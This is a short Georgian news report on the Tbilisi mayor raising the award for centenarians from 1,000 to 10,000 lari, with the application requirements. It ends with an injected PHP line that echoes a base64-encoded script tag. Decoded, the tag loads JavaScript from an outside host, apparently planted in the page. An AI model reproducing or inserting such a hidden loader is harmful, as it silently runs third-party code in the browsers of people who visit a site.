celsiusi
ავერსი jaluzi

მოქალაქეებს, რომლებიც 100 წლის გახდებიან და ბოლო ერთი წელია თბილისში ცხოვრობენ, მერია 10 000 ლარით დააჯილდოებს. ამის შესახებ მერმა, მუნიციპალიტეტის მთავრობის სხდომაზე განაცხადა.

ჯილდო ამ დრომდე 1 000 ლარი იყო.

„როდესაც ადამიანს უსრულდებოდა 100 წელი, დედაქალაქის მერია მას გადასცემდა ჯილდოს ათასი ლარის სახით. მივიღეთ გადაწყვეტილება, რომ ჯილდო ათჯერ გაიზრდება და 10 ათასი ლარი იქნება იმ ადამიანებისთვის, ვისაც 100 და მეტი წელი შეუსრულდება. გასულ წელს 57 ადამიანს ჩაერიცხა თანხა, აქედან 23-ს შეუსრულდა 100 წელი და 34-ს კი 101 და მეტი. მინდა ამ ადამიანებს, პირველ რიგში, ჯანმრთელობა და დიდხანს სიცოცხლე ვუსურვო. ჯილდოს მისაღებად, მოქალაქემ ან მისმა წარმომადგენლებმა თბილისის მერიის ჯანმრთელობისა და სოციალური მომსახურების საქალაქო სამსახურს განცხადებით უნდა მიმართონ. განცხადებას თან უნდა ერთვოდეს 100 წელს მიღწეული მოქალაქის პირადობის დამადასტურებელი მოწმობა და ბოლო ერთი წლის განმავლობაში თბილისში უწყვეტი რეგისტრაციის შესახებ სამოქალაქო რეესტრის მიერ გაცემული საინფორმაციო ბარათი. იმ ხანდაზმულებს, რომლებმაც 2025 წლამდე აღნიშნული პროგრამით უკვე ისარგებლეს, განცხადების დაწერა აღარ მოუწევთ და ბენეფიტი პირდაპირ ჩაერიცხებათ“,- განაცხადა კალაძემ.

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");